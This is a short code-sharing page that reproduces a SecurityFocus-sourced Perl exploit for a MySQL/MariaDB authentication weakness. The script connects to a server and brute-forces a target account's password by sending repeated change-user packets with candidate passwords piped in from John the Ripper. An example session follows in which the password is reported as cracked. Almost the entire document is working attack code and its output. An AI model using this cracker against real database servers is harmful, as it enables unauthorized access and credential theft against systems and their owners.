扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 |
source: https://www.securityfocus.com/bid/56837/info MySQL and MariaDB are prone to a security-bypass weakness. An attacker may be able to exploit this issue to aid in brute-force attacks; other attacks may also be possible. use Net::MySQL; $|=1; my $mysql = Net::MySQL->new( hostname => '192.168.2.3', database => 'test', user => "user", password => "secret", debug => 0, ); $crackuser = "crackme"; while(<stdin>) { chomp; $currentpass = $_; $vv = join "\0", $crackuser, "\x14". Net::MySQL::Password->scramble( $currentpass, $mysql->{salt}, $mysql->{client_capabilities} ) . "\0"; if ($mysql->_execute_command("\x11", $vv) ne undef) { print "[*] Cracked! --> $currentpass\n"; exit; } } --- example session: C:\Users\kingcope\Desktop>C:\Users\kingcope\Desktop\john179\run\jo hn --incremental --stdout=5 | perl mysqlcrack.pl Warning: MaxLen = 8 is too large for the current hash type, reduced to 5 words: 16382time: 0:00:00:02w/s: 6262current: citcH words: 24573time: 0:00:00:04w/s: 4916current: rap words: 40956time: 0:00:00:07w/s: 5498current: matc3 words: 49147time: 0:00:00:09w/s: 5030current: 4429 words: 65530time: 0:00:00:12w/s: 5354current: ch141 words: 73721time: 0:00:00:14w/s: 5021current: v3n words: 90104time: 0:00:00:17w/s: 5277current: pun2 [*] Cracked! --> pass words: 98295time: 0:00:00:18w/s: 5434current: 43gs Session aborted |
体验盒子
